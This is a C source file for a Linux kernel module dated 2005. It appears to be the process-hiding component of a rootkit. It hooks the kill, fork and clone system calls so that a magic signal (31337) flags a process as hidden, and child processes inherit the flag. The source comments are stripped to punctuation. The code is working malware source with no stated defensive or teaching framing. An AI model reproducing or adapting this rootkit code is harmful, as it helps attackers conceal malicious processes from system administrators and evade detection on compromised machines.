/****************************************************
 *                                                  *
 *     .                   *
 *     kill -31337 pid.  *
 *     fork(), clone()           *
 *     .                    *
 *  Written by _4epen, 2005.                        *
 *                                                  *
 ****************************************************/
 
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>

#include "prototp.h"

/*      ;) */
extern int (*o_kill)(pid_t, int);
extern int (*o_fork)(struct pt_regs);
extern int (*o_clone)(struct pt_regs);

/*    kill()      */
int h_kill(pid_t pid, int sig)
{
	struct task_struct* process;
	/*    kill()  */
	if(sig!=31337) return o_kill(pid, sig);
	/*      */
	process = get_process(pid);
	/*      */
	process->flags |= 0x10000000;
	return 0;
}

/*     fork()    */
int h_fork(struct pt_regs regs)
{
	pid_t pid;
	/*      */
	pid = o_fork(regs);
	/*     ,   */
	if(hidden(current->pid)) h_kill(pid, 31337);
	return pid;
}

/*     clone()    */
int h_clone(struct pt_regs regs)
{
	pid_t pid;
	/*      */
	pid = o_clone(regs);
	/*     ,   */
	if(hidden(current->pid) && pid>0) h_kill(pid, 31337);
	return pid;
}

int show_proc(pid_t pid)
{
	struct task_struct* process;
	/*     */
	process = get_process(pid);
	/*      */
	if((process->flags & 0x10000000) == 0x10000000) process->flags &= ~(0x10000000);
	return 0;
}
